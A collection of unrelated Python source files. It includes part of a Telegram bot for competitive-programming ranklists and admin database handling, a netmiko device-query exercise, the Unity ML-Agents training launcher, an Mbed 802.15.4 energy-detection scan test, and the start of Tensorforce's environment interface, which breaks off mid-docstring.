user_data['name1'] = msg
conn.close()
return XOLO
else:
conn.close()
update.message.reply_text("Sorry this name not found")
return ConversationHandler.END
# FUNCTION TO SHOW THE KIND OF RANKLIST USER WANTS
def xolo(bot, update, user_data):
query = update.callback_query
val = query.data
choices = ['HElist8', 'HRlist8', 'CClist8', 'SPlist8', 'CFlist8', 'ALLlist8']
if val not in choices:
return ConversationHandler.END
val=str(val).replace("list8","")
name1 = user_data['name1']
conn = sqlite3.connect(mount_point+'coders1.db')
c = conn.cursor()
if val == "ALL":
c.execute("SELECT name, HE, HR, SP, CC, CF FROM datas WHERE name=(?)", (name1,))
bot.edit_message_text(text='Sending please wait',
chat_id=query.message.chat_id,
message_id=query.message.message_id)
workbook = Workbook('det.xlsx')
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
mysel = c.execute("SELECT name, HE, HR, SP, CC, CF FROM datas WHERE name=(?)", (name1,))
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
bot.send_document(chat_id=query.message.chat_id, document=open('det.xlsx', 'rb'))
os.remove('det.xlsx')
else:
c.execute("SELECT " + val + " FROM datas WHERE name=(?)", (name1,))
for i in c.fetchall():
if i[0] is None or i[0] == "":
bot.edit_message_text(text="Not Registered",
chat_id=query.message.chat_id,
message_id=query.message.message_id)
else:
bot.edit_message_text(text="" + i[0],
chat_id=query.message.chat_id,
message_id=query.message.message_id)
user_data.clear()
conn.close()
return ConversationHandler.END
# FUNCTION TO SHOW THE RANKLIST OF ALL THE PEOPLE
def holo(bot, update):
query = update.callback_query
val = query.data
choices = ['HElist6', 'HRlist6', 'CClist6', 'SPlist6', 'CFlist6', 'ALLlist6']
if val not in choices:
return ConversationHandler.END
val = str(val).replace("list6", "")
if val == "ALL":
try:
bot.edit_message_text(text='I am sending you the details',
chat_id=query.message.chat_id,
message_id=query.message.message_id)
bot.send_document(chat_id=query.message.chat_id, document=open(mount_point+'all.xlsx', 'rb'))
except FileNotFoundError:
bot.edit_message_text(text='Sorry no entry found',
chat_id=query.message.chat_id,
message_id=query.message.message_id)
return ConversationHandler.END
else:
try:
bot.edit_message_text(text='I am sending you the details',
chat_id=query.message.chat_id,
message_id=query.message.message_id)
bot.send_document(chat_id=query.message.chat_id, document=open(mount_point + val + ".xlsx", 'rb'))
except FileNotFoundError:
bot.edit_message_text(text='Sorry no entry found',
chat_id=query.message.chat_id,
message_id=query.message.message_id)
return ConversationHandler.END
return ConversationHandler.END
# END OF CONVERSATION HANDLER TO GET THE RANKLIST
# COMMAND HANDLER FUNCTION FOR CANCELLING
def cancel(bot, update, user_data):
update.message.reply_text('Cancelled')
user_data.clear()
return ConversationHandler.END
# START OF ADMIN COMMANDS
# ADMIN COMMAND HANDLER FUNCTION TO RUN UPDATE WHEN HE WANTS
@timeouts.wrapper
def adminupdate(bot, update):
if not str(update.message.chat_id) in adminlist:
update.message.reply_text("sorry you are not an admin")
return
updaters()
@timeouts.wrapper
def restart(bot, update):
if not str(update.message.chat_id) in adminlist:
update.message.reply_text("sorry you are not an admin")
return
bot.send_message(update.message.chat_id, "Bot is restarting...")
time.sleep(0.2)
os.execl(sys.executable, sys.executable, *sys.argv)
# ADMIN COMMAND HANDLER FUNCTION TO UPDATE ALL THE QUESTIONS WHEN HE WANTS
@timeouts.wrapper
def admqupd(bot, update):
if not str(update.message.chat_id) in adminlist:
update.message.reply_text("sorry you are not an admin")
return
qupd()
updateCf()
# START OF ADMIN CONVERSATION HANDLER TO REPLACE THE DATABASE
@timeouts.wrapper
def getDb(bot, update):
if not str(update.message.chat_id) in adminlist:
update.message.reply_text("sorry you are not an admin")
return ConversationHandler.END
update.message.reply_text("send your sqlite database")
return DB
def db(bot, update):
file_id = update.message.document.file_id
newFile = bot.get_file(file_id)
newFile.download(mount_point+'coders1.db')
update.message.reply_text("saved")
return ConversationHandler.END
# END OF ADMIN CONVERSATION HANDLER TO REPLACE THE DATABASE
# START OF ADMIN CONVERSATION HANDLER TO REPLACE THE CODEFORCES JSON
@timeouts.wrapper
def getCf(bot, update):
if not str(update.message.chat_id) in adminlist:
update.message.reply_text("sorry you are not an admin")
return ConversationHandler.END
update.message.reply_text("send your json file")
return CF
def cf(bot, update):
global qcf
file_id = update.message.document.file_id
newFile = bot.get_file(file_id)
newFile.download(mount_point+'codeforces.json')
update.message.reply_text("saved")
with open(mount_point+'codeforces.json','r') as codeforces:
qcf=json.load(codeforces)
return ConversationHandler.END
# END OF ADMIN CONVERSATION HANDLER TO REPLACE THE CODEFORCES JSON
# ADMIN COMMAND HANDLER FOR GETTING THE DATABASE
@timeouts.wrapper
def givememydb(bot, update):
if not str(update.message.chat_id) in adminlist:
update.message.reply_text("sorry you are not an admin")
return
bot.send_document(chat_id=update.message.chat_id, document=open(mount_point+'coders1.db', 'rb'))
# ADMIN COMMAND HANDLER FOR GETTING THE CODEFORCES JSON
@timeouts.wrapper
def getcfjson(bot,update):
if not str(update.message.chat_id) in adminlist:
update.message.reply_text("sorry you are not an admin")
return
bot.send_document(chat_id=update.message.chat_id, document=open(mount_point+'codeforces.json', 'rb'))
# ADMIN COMMAND HANDLER FUNCTION TO GET THE DETAILS OF HANDLES OF ALL THE USERS IN DATABASE
@timeouts.wrapper
def adminhandle(bot, update):
if not str(update.message.chat_id) in adminlist:
update.message.reply_text("sorry you are not an admin")
return
conn = sqlite3.connect(mount_point+'coders1.db')
c = conn.cursor()
c.execute('SELECT * FROM handles')
workbook = Workbook("admin.xlsx")
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
mysel = c.execute("SELECT * FROM handles")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
workbook.close()
bot.send_document(chat_id=update.message.chat_id, document=open('admin.xlsx', 'rb'))
os.remove('admin.xlsx')
conn.close()
# END OF ADMIN COMMANDS
# MAIN SETUP FUNCTION
def setup(webhook_url=None):
"""If webhook_url is not passed, run with long-polling."""
logging.basicConfig(level=logging.WARNING)
if webhook_url:
bot = Bot(TOKEN)
update_queue = Queue()
dp = Dispatcher(bot, update_queue)
else:
updater = Updater(TOKEN)
bot = updater.bot
dp = updater.dispatcher
# CONVERSATION HANDLER FOR REGISTERING
conv_handler = ConversationHandler(
entry_points=[CommandHandler('register', register)],
allow_reentry=True,
states={
NAME: [MessageHandler(Filters.text, name, pass_user_data=True)],
JUDGE: [CallbackQueryHandler(judge, pass_user_data=True,pattern=r'\w*reg1\b')],
HANDLE: [MessageHandler(Filters.text, handle, pass_user_data=True)]
},
fallbacks=[CommandHandler('cancel', cancel, pass_user_data=True)]
)
# CONVERSATION HANDLER FOR GETTING RANKLIST
conv_handler1 = ConversationHandler(
entry_points=[CommandHandler('ranklist', ranklist)],
allow_reentry=True,
states={
SELECTION: [CallbackQueryHandler(selection,pattern=r'\w*sel1\b')],
HOLO: [CallbackQueryHandler(holo,pattern=r'\w*list6\b')],
SOLO: [CallbackQueryHandler(solo,pattern=r'\w*list7\b')],
POLO: [MessageHandler(Filters.text, polo, pass_user_data=True)],
XOLO: [CallbackQueryHandler(xolo, pass_user_data=True,pattern=r'\w*list8\b')]
},
fallbacks=[CommandHandler('cancel', cancel, pass_user_data=True)]
)
# CONVERSATION HANDLER FOR UNREGISTERING
conv_handler2 = ConversationHandler(
entry_points=[CommandHandler('unregister', unregister)],
allow_reentry=True,
states={
REMOVER: [CallbackQueryHandler(remover,pattern=r'\w*rem2\b')]
},
fallbacks=[CommandHandler('cancel', cancel, pass_user_data=True)]
)
# CONVERSATION HANDLER FOR UPDATING
conv_handler3 = ConversationHandler(
entry_points=[CommandHandler('update', updatesel)],
allow_reentry=True,
states={
UPDA: [CallbackQueryHandler(updasel,pattern=r'\w*upd5\b')]
},
fallbacks=[CommandHandler('cancel', cancel, pass_user_data=True)]
)
# CONVERSATION HANDLER FOR COMPILING AND RUNNING
conv_handler4 = ConversationHandler(
entry_points=[CommandHandler('compiler', compilers)],
allow_reentry=True,
states={
LANG: [CallbackQueryHandler(lang, pass_user_data=True,pattern=r'\w*comp1\b')],
CODE: [CallbackQueryHandler(code, pass_user_data=True,pattern=r'\w*so1\b')],
DECODE: [MessageHandler(Filters.text, decode, pass_user_data=True)],
TESTCASES: [MessageHandler(Filters.text, testcases, pass_user_data=True)],
OTHER: [MessageHandler(Filters.text, other, pass_user_data=True)],
FILE: [MessageHandler(Filters.document, filer, pass_user_data=True)],
FILETEST: [MessageHandler(Filters.document, filetest, pass_user_data=True)]
},
fallbacks=[CommandHandler('cancel', cancel, pass_user_data=True)]
)
# CONVERSATION HANDLER FOR GETTING A RANDOM QUESTION FROM CODECHEF
conv_handler5 = ConversationHandler(
entry_points=[CommandHandler('randomcc', randomcc)],
allow_reentry=True,
states={
QSELCC: [CallbackQueryHandler(qselcc,pattern=r'\w*cc1\b')]
},
fallbacks=[CommandHandler('cancel', cancel, pass_user_data=True)]
)
# CONVERSATION HANDLER FOR GEEKS FOR GEEKS
conv_handler6 = ConversationHandler(
entry_points=[CommandHandler('geeksforgeeks', gfg)],
allow_reentry=True,
states={
GFG1: [CallbackQueryHandler(gfg1, pass_user_data=True,pattern=r'\w*gfg1\b')],
GFG2: [CallbackQueryHandler(gfg2, pass_user_data=True,pattern='^.*gfg2.*$')],
GFG3: [CallbackQueryHandler(gfg3, pass_user_data=True,pattern='^.*gfg3.*$')]
},
fallbacks=[CommandHandler('cancel', cancel, pass_user_data=True)]
)
# CONVERSATION HANDLER FOR REPLACING SQLITE DATABASE
conv_handler7 = ConversationHandler(
entry_points=[CommandHandler('senddb', getDb)],
allow_reentry=True,
states={
DB: [MessageHandler(Filters.document, db)]
},
fallbacks=[CommandHandler('cancel', cancel, pass_user_data=True)]
)
# CONVERSATION HANDLER FOR GETTING UPCOMING COMPETITIONS
conv_handler8 = ConversationHandler(
entry_points=[CommandHandler('upcoming', upcoming)],
allow_reentry=True,
states={
SCHED: [CallbackQueryHandler(remind,pattern=r"^[0-9]*$")]
},
fallbacks=[CommandHandler('cancel', cancel, pass_user_data=True)]
)
# CONVERSATION HANDLER FOR REMOVING CONTEST REMINDERS
conv_handler9 = ConversationHandler(
entry_points=[CommandHandler('dontRemindMe', removeRemind)],
allow_reentry=True,
states={
REMNOTI: [CallbackQueryHandler(remnoti,pattern=r'^.*notiplz.*$')]
},
fallbacks=[CommandHandler('cancel', cancel, pass_user_data=True)]
)
# CONVERSATION HANDLER FOR GETTING RANDOM QUESTION FROM CODEFORCES
conv_handler10 = ConversationHandler(
entry_points=[CommandHandler('randomcf', randomcf)],
allow_reentry=True,
states={
QSELCF: [CallbackQueryHandler(qselcf,pattern=r'\w*cf1\b')]
},
fallbacks=[CommandHandler('cancel', cancel, pass_user_data=True)]
)
# ADMIN CONVERSATION HANDLER TO REPLACE CODEFORCES JSON FILE
conv_handler11 = ConversationHandler(
entry_points=[CommandHandler('sendcf', getCf)],
allow_reentry=True,
states={
CF: [MessageHandler(Filters.document,cf)]
},
fallbacks=[CommandHandler('cancel', cancel, pass_user_data=True)]
)
# CONVERSATION HANDLER TO SUBSCRIBE TO QUESTION OF THE DAY
conv_handler12 = ConversationHandler(
entry_points=[CommandHandler('subscribe', subscribe)],
allow_reentry=True,
states={
SUBSEL:[CallbackQueryHandler(subsel,pattern=r'\w*sub3\b')],
SUBCC:[CallbackQueryHandler(subcc,pattern=r'\w*cc2\b')],
SUBCF: [CallbackQueryHandler(subcf,pattern=r'\w*cf2\b')]
},
fallbacks=[CommandHandler('cancel', cancel, pass_user_data=True)]
)
# CONVERSATION HANDLER TO UNSUBSCRIBE FROM QUESTION OF THE DAY
conv_handler13 = ConversationHandler(
entry_points=[CommandHandler('unsubscribe', unsubsel)],
allow_reentry=True,
states={
UNSUB: [CallbackQueryHandler(unsub,pattern=r'\w*unsub4\b')]
},
fallbacks=[CommandHandler('cancel', cancel, pass_user_data=True)]
)
dp.add_handler(conv_handler)
dp.add_handler(conv_handler1)
dp.add_handler(conv_handler2)
dp.add_handler(conv_handler3)
dp.add_handler(conv_handler4)
dp.add_handler(conv_handler5)
dp.add_handler(conv_handler6)
dp.add_handler(conv_handler7)
dp.add_handler(conv_handler8)
dp.add_handler(conv_handler9)
dp.add_handler(conv_handler10)
dp.add_handler(conv_handler11)
dp.add_handler(conv_handler12)
dp.add_handler(conv_handler13)
dp.add_handler(CommandHandler('help', help))
dp.add_handler(CommandHandler('givememydb', givememydb))
dp.add_handler(CommandHandler('getcfjson', getcfjson))
dp.add_handler(CommandHandler('start', start))
dp.add_handler(CommandHandler('ongoing', ongoing))
dp.add_handler(CommandHandler('adminhandle', adminhandle))
dp.add_handler(CommandHandler('adminud', adminupdate))
dp.add_handler(CommandHandler('adminuq', admqupd))
dp.add_handler(CommandHandler('adminrestart', restart))
# log all errors
dp.add_error_handler(error)
if webhook_url:
bot.set_webhook(webhook_url=webhook_url)
thread = Thread(target=dp.start, name='dispatcher')
thread.start()
return update_queue, bot
else:
bot.set_webhook() # Delete webhook
updater.start_polling()
updater.idle()
if __name__ == '__main__':
setup() |
exercise8.py | #!/usr/bin/env python
'''
Exercise 8 - Class 8 - Thread connection to each device and run the command
Gleydson Mazioli <gleydsonmazioli@gmail.com>
'''
from net_system.models import NetworkDevice
import netmiko
import django
import time
from multiprocessing import Process, Queue
def get_cred_type(l_credentials, l_type):
'''
Get the associated credential from the database (instead of
using a hard coded list)
'''
for cred in l_credentials:
if l_type in cred.description.lower():
return cred
def run_command(device, queue):
'''
Connect to a host and run a command
'''
device_type = device.device_type
port = device.port
secret = ''
ip_addr = device.ip_address
creds = device.credentials
out_dict = {}
try:
username = creds.username
password = creds.password
except AttributeError:
print '%s: No credentials attributes for login. Skipping' % (device)
return 1
try:
rem_conn = netmiko.ConnectHandler(device_type=device_type, ip=ip_addr,
username=username, password=password,
port=port, secret=secret)
except netmiko.ssh_exception.NetMikoAuthenticationException:
print " %s: Unable to connect (check user/pw)" % (device)
return 1
out = ('*' * 70) + '\n'
out += rem_conn.send_command_expect("show version")
out += ('*' * 70) + '\n'
out_dict[device.device_name] = out
queue.put(out_dict)
def main():
'''
Main function
'''
django.setup()
net_devices = NetworkDevice.objects.all()
start_time = int(time.time())
queue = Queue(maxsize=20)
procs = []
for device in net_devices:
my_proc = Process(target=run_command, args=(device, queue))
my_proc.start()
procs.append(my_proc)
for a_proc in procs:
a_proc.join()
while not queue.empty():
my_dict = queue.get()
for k, value in my_dict.iteritems():
print '*' * 70
print k
print value
print '\nElapsed time: %s sec' % (int(time.time()) - start_time)
if __name__ == '__main__':
main()
|
learn.py | # # Unity ML-Agents Toolkit
import logging
import argparse
from multiprocessing import Process, Queue
import os
import glob
import shutil
import numpy as np
from typing import Any, Callable, Optional, List, NamedTuple
from mlagents.trainers.trainer_controller import TrainerController
from mlagents.trainers.exception import TrainerError
from mlagents.trainers.meta_curriculum import MetaCurriculum
from mlagents.trainers.trainer_util import load_config, TrainerFactory
from mlagents.envs.environment import UnityEnvironment
from mlagents.envs.sampler_class import SamplerManager
from mlagents.envs.exception import SamplerException
from mlagents.envs.base_unity_environment import BaseUnityEnvironment
from mlagents.envs.subprocess_env_manager import SubprocessEnvManager
class CommandLineOptions(NamedTuple):
debug: bool
num_runs: int
seed: int
env_path: str
run_id: str
load_model: bool
train_model: bool
save_freq: int
keep_checkpoints: int
base_port: int
num_envs: int
curriculum_folder: Optional[str]
lesson: int
slow: bool
no_graphics: bool
multi_gpu: bool # ?
trainer_config_path: str
sampler_file_path: Optional[str]
docker_target_name: Optional[str]
env_args: Optional[List[str]]
cpu: bool
@property
def fast_simulation(self) -> bool:
return not self.slow
@staticmethod
def from_argparse(args: Any) -> "CommandLineOptions":
return CommandLineOptions(**vars(args))
def parse_command_line(argv: Optional[List[str]] = None) -> CommandLineOptions:
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument("trainer_config_path")
parser.add_argument(
"--env", default=None, dest="env_path", help="Name of the Unity executable "
)
parser.add_argument(
"--curriculum",
default=None,
dest="curriculum_folder",
help="Curriculum json directory for environment",
)
parser.add_argument(
"--sampler",
default=None,
dest="sampler_file_path",
help="Reset parameter yaml file for environment",
)
parser.add_argument(
"--keep-checkpoints",
default=5,
type=int,
help="How many model checkpoints to keep",
)
parser.add_argument(
"--lesson", default=0, type=int, help="Start learning from this lesson"
)
parser.add_argument(
"--load",
default=False,
dest="load_model",
action="store_true",
help="Whether to load the model or randomly initialize",
)
parser.add_argument(
"--run-id",
default="ppo",
help="The directory name for model and summary statistics",
)
parser.add_argument(
"--num-runs", default=1, type=int, help="Number of concurrent training sessions"
)
parser.add_argument(
"--save-freq", default=50000, type=int, help="Frequency at which to save model"
)
parser.add_argument(
"--seed", default=-1, type=int, help="Random seed used for training"
)
parser.add_argument(
"--slow", action="store_true", help="Whether to run the game at training speed"
)
parser.add_argument(
"--train",
default=False,
dest="train_model",
action="store_true",
help="Whether to train model, or only run inference",
)
parser.add_argument(
"--base-port",
default=5005,
type=int,
help="Base port for environment communication",
)
parser.add_argument(
"--num-envs",
default=1,
type=int,
help="Number of parallel environments to use for training",
)
parser.add_argument(
"--docker-target-name",
default=None,
dest="docker_target_name",
help="Docker volume to store training-specific files",
)
parser.add_argument(
"--no-graphics",
default=False,
action="store_true",
help="Whether to run the environment in no-graphics mode",
)
parser.add_argument(
"--debug",
default=False,
action="store_true",
help="Whether to run ML-Agents in debug mode with detailed logging",
)
parser.add_argument(
"--multi-gpu",
default=False,
action="store_true",
help="Setting this flag enables the use of multiple GPU's (if available) during training",
)
parser.add_argument(
"--env-args",
default=None,
nargs=argparse.REMAINDER,
help="Arguments passed to the Unity executable.",
)
parser.add_argument(
"--cpu", default=False, action="store_true", help="Run with CPU only"
)
args = parser.parse_args(argv)
return CommandLineOptions.from_argparse(args)
def run_training(
sub_id: int, run_seed: int, options: CommandLineOptions, process_queue: Queue
) -> None:
"""
Launches training session.
:param process_queue: Queue used to send signal back to main.
:param sub_id: Unique id for training session.
:param options: parsed command line arguments
:param run_seed: Random seed used for training.
:param run_options: Command line arguments for training.
"""
# Docker Parameters
trainer_config_path = options.trainer_config_path
curriculum_folder = options.curriculum_folder
# Recognize and use docker volume if one is passed as an argument
if not options.docker_target_name:
model_path = "./models/{run_id}-{sub_id}".format(
run_id=options.run_id, sub_id=sub_id
)
summaries_dir = "./summaries"
else:
trainer_config_path = "/{docker_target_name}/{trainer_config_path}".format(
docker_target_name=options.docker_target_name,
trainer_config_path=trainer_config_path,
)
if curriculum_folder is not None:
curriculum_folder = "/{docker_target_name}/{curriculum_folder}".format(
docker_target_name=options.docker_target_name,
curriculum_folder=curriculum_folder,
)
model_path = "/{docker_target_name}/models/{run_id}-{sub_id}".format(
docker_target_name=options.docker_target_name,
run_id=options.run_id,
sub_id=sub_id,
)
summaries_dir = "/{docker_target_name}/summaries".format(
docker_target_name=options.docker_target_name
)
trainer_config = load_config(trainer_config_path)
port = options.base_port + (sub_id * options.num_envs)
if options.env_path is None:
port = 5004 # This is the in Editor Training Port
env_factory = create_environment_factory(
options.env_path,
options.docker_target_name,
options.no_graphics,
run_seed,
port,
options.env_args,
)
env = SubprocessEnvManager(env_factory, options.num_envs)
maybe_meta_curriculum = try_create_meta_curriculum(
curriculum_folder, env, options.lesson
)
sampler_manager, resampling_interval = create_sampler_manager(
options.sampler_file_path, env.reset_parameters, run_seed
)
trainer_factory = TrainerFactory(
trainer_config,
summaries_dir,
options.run_id,
model_path,
options.keep_checkpoints,
options.train_model,
options.load_model,
run_seed,
maybe_meta_curriculum,
options.multi_gpu,
)
# Create controller and begin training.
tc = TrainerController(
trainer_factory,
model_path,
summaries_dir,
options.run_id + "-" + str(sub_id),
options.save_freq,
maybe_meta_curriculum,
options.train_model,
run_seed,
options.fast_simulation,
sampler_manager,
resampling_interval,
)
# Signal that environment has been launched.
process_queue.put(True)
# Begin training
tc.start_learning(env)
def create_sampler_manager(sampler_file_path, env_reset_params, run_seed=None):
sampler_config = None
resample_interval = None
if sampler_file_path is not None:
sampler_config = load_config(sampler_file_path)
if "resampling-interval" in sampler_config:
# Filter arguments that do not exist in the environment
resample_interval = sampler_config.pop("resampling-interval")
if (resample_interval <= 0) or (not isinstance(resample_interval, int)):
raise SamplerException(
"Specified resampling-interval is not valid. Please provide"
" a positive integer value for resampling-interval"
)
else:
raise SamplerException(
"Resampling interval was not specified in the sampler file."
" Please specify it with the 'resampling-interval' key in the sampler config file."
)
sampler_manager = SamplerManager(sampler_config, run_seed)
return sampler_manager, resample_interval
def try_create_meta_curriculum(
curriculum_folder: Optional[str], env: SubprocessEnvManager, lesson: int
) -> Optional[MetaCurriculum]:
if curriculum_folder is None:
return None
else:
meta_curriculum = MetaCurriculum(curriculum_folder, env.reset_parameters)
# TODO: Should be able to start learning at different lesson numbers
# for each curriculum.
meta_curriculum.set_all_curriculums_to_lesson_num(lesson)
return meta_curriculum
def prepare_for_docker_run(docker_target_name, env_path):
for f in glob.glob(
"/{docker_target_name}/*".format(docker_target_name=docker_target_name)
):
if env_path in f:
try:
b = os.path.basename(f)
if os.path.isdir(f):
shutil.copytree(f, "/ml-agents/{b}".format(b=b))
else:
src_f = "/{docker_target_name}/{b}".format(
docker_target_name=docker_target_name, b=b
)
dst_f = "/ml-agents/{b}".format(b=b)
shutil.copyfile(src_f, dst_f)
os.chmod(dst_f, 0o775) # Make executable
except Exception as e:
logging.getLogger("mlagents.trainers").info(e)
env_path = "/ml-agents/{env_path}".format(env_path=env_path)
return env_path
def create_environment_factory(
env_path: str,
docker_target_name: Optional[str],
no_graphics: bool,
seed: Optional[int],
start_port: int,
env_args: Optional[List[str]],
) -> Callable[[int], BaseUnityEnvironment]:
if env_path is not None:
# Strip out executable extensions if passed
env_path = (
env_path.strip()
.replace(".app", "")
.replace(".exe", "")
.replace(".x86_64", "")
.replace(".x86", "")
)
docker_training = docker_target_name is not None
if docker_training and env_path is not None:
"""
Comments for future maintenance:
Some OS/VM instances (e.g. COS GCP Image) mount filesystems
with COS flag which prevents execution of the Unity scene,
to get around this, we will copy the executable into the
container.
"""
# Navigate in docker path and find env_path and copy it.
env_path = prepare_for_docker_run(docker_target_name, env_path)
seed_count = 10000
seed_pool = [np.random.randint(0, seed_count) for _ in range(seed_count)]
def create_unity_environment(worker_id: int) -> UnityEnvironment:
env_seed = seed
if not env_seed:
env_seed = seed_pool[worker_id % len(seed_pool)]
return UnityEnvironment(
file_name=env_path,
worker_id=worker_id,
seed=env_seed,
docker_training=docker_training,
no_graphics=no_graphics,
base_port=start_port,
args=env_args,
)
return create_unity_environment
def main():
try:
print(
"""
▄▄▄▓▓▓▓
╓▓▓▓▓▓▓█▓▓▓▓▓
,▄▄▄m▀▀▀' ,▓▓▓▀▓▓▄ ▓▓▓ ▓▓▌
▄▓▓▓▀' ▄▓▓▀ ▓▓▓ ▄▄ ▄▄ ,▄▄ ▄▄▄▄ ,▄▄ ▄▓▓▌▄ ▄▄▄ ,▄▄
▄▓▓▓▀ ▄▓▓▀ ▐▓▓▌ ▓▓▌ ▐▓▓ ▐▓▓▓▀▀▀▓▓▌ ▓▓▓ ▀▓▓▌▀ ^▓▓▌ ╒▓▓▌
▄▓▓▓▓▓▄▄▄▄▄▄▄▄▓▓▓ ▓▀ ▓▓▌ ▐▓▓ ▐▓▓ ▓▓▓ ▓▓▓ ▓▓▌ ▐▓▓▄ ▓▓▌
▀▓▓▓▓▀▀▀▀▀▀▀▀▀▀▓▓▄ ▓▓ ▓▓▌ ▐▓▓ ▐▓▓ ▓▓▓ ▓▓▓ ▓▓▌ ▐▓▓▐▓▓
^█▓▓▓ ▀▓▓▄ ▐▓▓▌ ▓▓▓▓▄▓▓▓▓ ▐▓▓ ▓▓▓ ▓▓▓ ▓▓▓▄ ▓▓▓▓`
'▀▓▓▓▄ ^▓▓▓ ▓▓▓ └▀▀▀▀ ▀▀ ^▀▀ `▀▀ `▀▀ '▀▀ ▐▓▓▌
▀▀▀▀▓▄▄▄ ▓▓▓▓▓▓, ▓▓▓▓▀
`▀█▓▓▓▓▓▓▓▓▓▌
¬`▀▀▀█▓
"""
)
except Exception:
print("\n\n\tUnity Technologies\n")
options = parse_command_line()
trainer_logger = logging.getLogger("mlagents.trainers")
env_logger = logging.getLogger("mlagents.envs")
trainer_logger.info(options)
if options.debug:
trainer_logger.setLevel("DEBUG")
env_logger.setLevel("DEBUG")
if options.env_path is None and options.num_runs > 1:
raise TrainerError(
"It is not possible to launch more than one concurrent training session "
"when training from the editor."
)
jobs = []
run_seed = options.seed
if options.cpu:
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
if options.num_runs == 1:
if options.seed == -1:
run_seed = np.random.randint(0, 10000)
run_training(0, run_seed, options, Queue())
else:
for i in range(options.num_runs):
if options.seed == -1:
run_seed = np.random.randint(0, 10000)
process_queue = Queue()
p = Process(target=run_training, args=(i, run_seed, options, process_queue))
jobs.append(p)
p.start()
# Wait for signal that environment has successfully launched
while process_queue.get() is not True:
continue
# Wait for jobs to complete. Otherwise we'll have an extra
# unhandled KeyboardInterrupt if we end early.
try:
for job in jobs:
job.join()
except KeyboardInterrupt:
pass
# For python debugger to directly run this script
if __name__ == "__main__":
main()
|
ED_scan.py | """
Copyright (c) 2017, Arm Limited and affiliates.
SPDX-License-Identifier: Apache-2.0
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import threading
import os,sys
from icetea_lib.bench import Bench
class Testcase(Bench):
def __init__(self):
Bench.__init__(self, name = "ED_scan",
title = "ED scan test",
status = "development",
type = "smoke",
subtype = "",
execution = {
"skip": {
"value": False,
"reason": ""
}
},
author = "Valtteri Erkkila",
purpose = "Tests reading the ED values from channels 11-16",
feature = ["MLME-SCAN (ED)"],
component = ["MAC"],
requirements = {
"duts": {
'*': {
"count":3,
"type": "hardware",
"allowed_platforms": ["K64F", "K66F", "NUCLEO_F429ZI", "KW24D", "UBLOX_EVK_ODIN_W2"],
"application": {
"name": "TEST_APPS-device-nanostack_mac_tester"
}
},
"1":{"nick": "First"},
"2":{"nick": "Second"},
"3":{"nick": "Third"}
}}
)
def setUp(self):
self.channel = 11
self.command("First", "addr --64-bit 01:02:03:00:00:00:00:01")
self.command("Second", "addr --64-bit 01:02:03:00:00:00:00:02")
self.command("Third", "addr --64-bit 01:02:03:00:00:00:00:03")
def spam_channel(self, event):
while not event.wait(0.1):
self.lock_th.acquire()
self.command("First", "data --dst_addr 01:02:03:00:00:00:00:03 --msdu {} --msdu_length {} --wait_for_confirm false".format(self.payload, len(self.payload)))
self.command("Third", "data --dst_addr 01:02:03:00:00:00:00:01 --msdu {} --msdu_length {} --wait_for_confirm false".format(self.payload, len(self.payload)))
self.lock_th.release()
def mask_from_channel_list(self, channels):
res = 0
for ch in channels:
res = res | ( 1 << ch)
return hex(res)
def case(self):
self.lock_th = threading.Lock()
self.payload = "01234567890123456789012345678901234567890123456789"
self.command("First", "start --pan_coordinator true --logical_channel {}".format(self.channel))
self.command("Second", "start --pan_coordinator false --logical_channel {}".format(self.channel))
self.command("Third", "start --pan_coordinator false --logical_channel {}".format(self.channel))
#No reason to print their spamming
self.command("First", "silent-mode on")
self.command("Third", "silent-mode on")
self.stop_event = threading.Event()
self.th = threading.Thread(target=self.spam_channel, args=(self.stop_event,))
self.th.start()
self.stopped = True
channels = range(11,27)
for i in range(0, 3):
self.lock_th.acquire()
self.command("First", "mlme-reset")
self.command("First", "start --pan_coordinator true --logical_channel {}".format(self.channel))
self.command("Third", "mlme-reset")
self.command("Third", "start --pan_coordinator false --logical_channel {}".format(self.channel))
self.lock_th.release()
self.command("Second", "scan --scan_type 0 --scan_duration 7 --channel_mask {}".format(self.mask_from_channel_list(channels)))
self.command("Second", "analyze-ed --channel {} --above 100".format(self.channel))
def tearDown(self):
self.command("First", "silent-mode off")
self.command("Third", "silent-mode off")
self.stop_event.set()
self.th.join()
del self.th
self.reset_dut()
|
environment.py | # Copyright 2020 Tensorforce Team. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import importlib
import json
import os
import sys
from threading import Thread
import time
from traceback import format_tb
from tensorforce import TensorforceError, util
import tensorforce.environments
class Environment(object):
"""
Tensorforce environment interface.
"""
@staticmethod
def create(
environment=None, max_episode_timesteps=None, remote=None, blocking=False, host=None,
port=None, **kwargs
):
"""
Creates an environment from a specification. In case of "socket-server" remote mode, runs
environment in server communication loop until closed.
Args:
environment (specification | Environment class/object): JSON file, specification key,
configuration dictionary, library module, `Environment` class/object, or gym.Env
(<span style="color:#C00000"><b>required</b></span>, invalid for "socket-client"
remote mode).
max_episode_timesteps (int > 0): Maximum number of timesteps per episode, overwrites
the environment default if defined
(<span style="color:#00C000"><b>default</b></span>: environment default, invalid
for "socket-client" remote mode).
remote ("multiprocessing" | "socket-client" | "socket-server"): Communication mode for
remote environment execution of parallelized environment execution, "socket-client"
mode requires a corresponding "socket-server" running, and "socket-server" mode
